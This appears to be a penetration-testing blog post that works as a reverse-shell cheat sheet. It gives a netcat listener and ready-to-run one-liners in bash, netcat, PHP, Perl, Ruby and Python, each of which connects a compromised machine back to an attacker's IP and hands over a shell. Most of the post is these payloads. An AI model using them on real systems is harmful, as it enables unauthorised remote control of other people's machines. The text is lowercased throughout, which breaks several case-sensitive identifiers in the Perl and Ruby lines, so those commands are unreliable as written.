in this post, we’ll explore several ways to obtain an interactive shell when you discover a command execution vulnerability during penetration testing. the choice of reverse shell method depends on the programming languages available on the target server. we'll cover commands for reverse shells using php, python, ruby, and more.
before proceeding, ensure that your attacking computer is set to "listen" using netcat:
sudo nc -l 1337
here,
1337is the port you open for listening. replace it with your preferred port if needed.
reverse shell using bash
bash is a straightforward method for a reverse shell. run this command on the target machine:
bash -i >& /dev/tcp/192.168.48.133/1337 0>&1
replace
192.168.48.133with your attacker's ip and1337with your chosen port.
reverse shell using netcat
netcat is another common option for reverse shells. use the following command:
/bin/nc.traditional -e /bin/sh 192.168.48.133 1337
reverse shell using php
for servers with php installed, use this command:
php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
if this fails, try changing the file descriptor number from 3 to 4, 5, or 6.
reverse shell using perl
perl can also be used for a reverse shell. run this command:
perl -e 'use socket;$i="192.168.48.133";$p=1337;socket(s,pf_inet,sock_stream,getprotobyname("tcp"));if(connect(s,sockaddr_in($p,inet_aton($i)))){open(stdin,">&s");open(stdout,">&s");open(stderr,">&s");exec("/bin/sh -i");};'
reverse shell using ruby
ruby provides another method for reverse shells. use this command:
ruby -rsocket -e 'f=tcpsocket.open("192.168.48.133",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
reverse shell using python
python is a versatile choice for reverse shells. execute the following command:
python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'